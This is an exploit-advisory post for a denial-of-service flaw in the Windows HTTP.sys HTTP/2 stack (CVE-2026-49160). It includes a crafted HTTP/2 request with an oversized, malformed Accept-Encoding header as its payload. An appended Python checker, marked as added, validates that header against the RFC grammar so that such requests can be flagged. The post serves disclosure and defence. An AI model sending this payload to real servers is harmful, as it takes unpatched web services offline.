
📄 HTTP.sys HTTP/2 Denial of Service

🗓️ 24 Jun 2026 | Reported by nu11secur1ty | Type: packetstorm | 🔗 packetstorm.news

DoS in Windows HTTP.sys HTTP/2 from unauthenticated attacker via malformed Accept-Encoding.

# Title: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
    # Author: nu11secur1ty
    # Date: 06/24/2026
    # Vendor: Microsoft Corporation
    # Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
    # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160
    
    ## Description:
    
    A critical Denial of Service (DoS) vulnerability exists in the Windows
    HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
    protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
    unauthenticated remote attacker to cause uncontrolled resource consumption
    (CWE-400) by sending a specially crafted HTTP/2 request with an oversized
    and malformed Accept-Encoding header. This triggers excessive memory
    allocation and CPU utilization within HTTP.sys, effectively crashing the
    service and rendering all dependent web services (such as IIS) unavailable.
    The attack can be executed within seconds and does not require any form of
    authentication or user interaction. All supported versions of Windows
    Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
    prior to the June 2026 security update.
    
    STATUS: MEDIUM-HIGH vulnerability
    
    [+]Payload:
    ```http
    POST / HTTP/2
    Host: target.com
    Accept-Encoding:
    AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
    ```
    
    [+]Demo:
    [Video demonstration](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)
    
    Time spent:
    00:01:20
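
For triaging request logs or pre-filtering traffic ahead of hosts that have not yet received the June 2026 update, the following added example (not part of the advisory, and not Microsoft's code) checks an `Accept-Encoding` value against the RFC 9110 grammar and flags the oversized, malformed shape the description refers to. The function name, the thresholds and the sample values are assumptions made for this example.

```python
import re

# RFC 9110 token characters (tchar) and the qvalue grammar for a weight.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
QVALUE = re.compile(r"0(\.\d{0,3})?|1(\.0{0,3})?")
# Content codings listed in the IANA HTTP content-coding registry, plus "*".
KNOWN = {"aes128gcm", "br", "compress", "dcb", "dcz", "deflate", "exi", "gzip",
         "identity", "pack200-gzip", "x-compress", "x-gzip", "zstd", "*"}
# Assumed thresholds for this example; tune them to your own traffic baseline.
MAX_VALUE_BYTES = 256
MAX_CODINGS = 16


def check_accept_encoding(value: str) -> list[str]:
    """Return sorted findings for one header value; an empty list means normal."""
    findings = set()
    if len(value.encode("utf-8")) > MAX_VALUE_BYTES:
        findings.add("oversized")
    members = [m.strip() for m in value.split(",")]
    codings = [m for m in members if m]
    if len(codings) > MAX_CODINGS:
        findings.add("too-many-codings")
    if len(members) - len(codings) > 1:  # repeated or trailing empty elements
        findings.add("empty-elements")
    for member in codings:
        coding, sep, weight = member.partition(";")
        coding = coding.strip()
        if not TOKEN.fullmatch(coding):
            findings.add("bad-token")
        elif coding.lower() not in KNOWN:
            findings.add("unknown-coding")
        if sep:  # a weight must be exactly q=<qvalue>
            name, _, q = weight.partition("=")
            if name.strip().lower() != "q" or not QVALUE.fullmatch(q.strip()):
                findings.add("bad-qvalue")
    return sorted(findings)


# Constructed sample values (not taken from the advisory or from real traffic).
SAMPLES = [
    "gzip, deflate, br;q=0.8",
    "gzip;q=1.5",
    ",".join(["X" * 40] * 10) + ",,",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{len(sample):4d} bytes  {check_accept_encoding(sample) or 'ok'}")
```

Browsers normally send a short list of registered codings, so any finding on this header is worth logging alongside the client address and HTTP version.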
